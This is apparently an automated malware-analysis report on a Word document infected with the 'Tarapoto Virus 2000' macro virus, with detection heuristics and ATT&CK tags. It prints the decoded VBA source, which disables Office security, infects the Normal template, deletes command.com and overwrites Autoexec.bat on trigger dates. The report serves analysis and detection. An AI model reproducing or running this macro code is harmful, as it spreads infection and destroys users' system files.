MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains legacy WordBasic macro virus markers and critical VBA heuristics indicating the presence of a Shell() call and auto-execution via the Document_Open macro. The script attempts to disable security features and execute code, likely to download and run a second-stage payload. The ClamAV detection of 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Tarap-1' further supports its malicious nature.
Heuristics 6
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5901 bytes |
SHA-256: 95ce50e4eb3b8eb93505d4ae9f8cc02bd12d3e88f3339fc850c8f8266a9eb981 |
|||
|
Detection
ClamAV:
Doc.Trojan.Tarap-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub document_open()
On Error Resume Next
VBE.MainWindow.Visible = False
With Options: .VirusProtection = False: .SaveNormalPrompt = False: .ConfirmConversions = False: End With
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable: FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable: WordBasic.DisableAutoMacros 0
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
'The dark
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Seguridad...").Enabled = False
End If
ayah = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: aya = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ID = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(7, 1)
If ID <> "'The dark" Then
If ayah >= 1 Then
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
For q = 1 To ayah
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1
Next q
End With
End If
End If
p = VBE.CommandBars.Count: pp = VBE.Windows.Count
For L = 1 To p
VBE.CommandBars.Item(L).Enabled = False
Next L
For L = 1 To pp
VBE.Windows.Item(L).Visible = False
Next L
If ayah < 81 Then
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name: ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\windows\wind.sys": ActiveDocument.VBProject.VBComponents.Item(2).Export "c:\windows\wtv.dll": NormalTemplate.VBProject.VBComponents.Import "c:\windows\wtv.dll"
End If
If aya = 0 Then
Set host = ActiveDocument.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Import "c:\windows\wtv.dll"
End If
host.CodeModule.AddFromFile ("c:\windows\wind.sys")
With host.CodeModule
For x = 1 To 4
.DeleteLines 1
Next x
End With
Randomize
a = Int((30 * Rnd) + 1): If Day(Now) = a Then MsgBox "The Dark is Ready... Este documento es una basura", 2046, "Tarapoto Virus 2000"
If Day(Now) = 1 And (Month(Now) Mod 2 = 0) Then MsgBox Application.UserName & ": Tu Pc esta bajo mi control; Visita Tarapoto Ciudad de las Palmeras. Virus creado por 'The Dark' tpp e-mail:thedarktpp@mixmail.com ", 0, "TARAPOTO VIRUS/tpp.win": Call tppform.Show
If Day(Now) = 1 And (Month(Now) = 9) Then
MsgBox "Hoy cumple " & Year(Now) - 1979 & " a駉s mi creador 'The Dark' y por eso nadie trabaja hoy. ", 4096, "TARAPOTO VIRUS/tpp.win"
Kill ("c:\command.com"): Shell ("c:\windows\rundll32.exe user,exitwindows")
End If
If ayah < 81 Then
With host.CodeModule:
.replaceline 1, "Sub document_close()": .replaceline 73, "Sub ViewVBcode()"
.replaceline 76, "Sub HelpAbout()": .replaceline 79, "Sub ToolsMacro()"
.replaceline 82, "Sub ToolsCustomizeKeyboard()": .replaceline 85, "Sub FileSaveAs()"
.replaceline 88, "End Sub"
End With
End If
If Day(Now) = 15 Then
Open "c:\Autoexec.bat" For Input As #1
Dim w, y: y = 0
Do While Not EOF(1)
Line Input #1, w: Debug.Print w
If w = "rem the dark" Then y = 1
Loop
Close #1
If y = 0 Then
Name ("c:\Autoexec.bat") As ("c:\autoexe.bat")
Close: Open "c:\Autoexec.bat" For Output As #1: Print #1, "@ echo off": Print #1, "rem the dark": Print #1, "echo TaRaPoTo's Soft Copyright 1999 - 2002 ": Print #1, "echo by: The Dark ": Print #1, "echo e-mail: thedarktpp@mixmail.com": Print #1, "echo. ": Print #1, "pause": Print #1, "Autoexe": Close #1
End If
End If
If ayah >= 88 And aya = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub FileTemplates()
Shell ("c:\wi
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.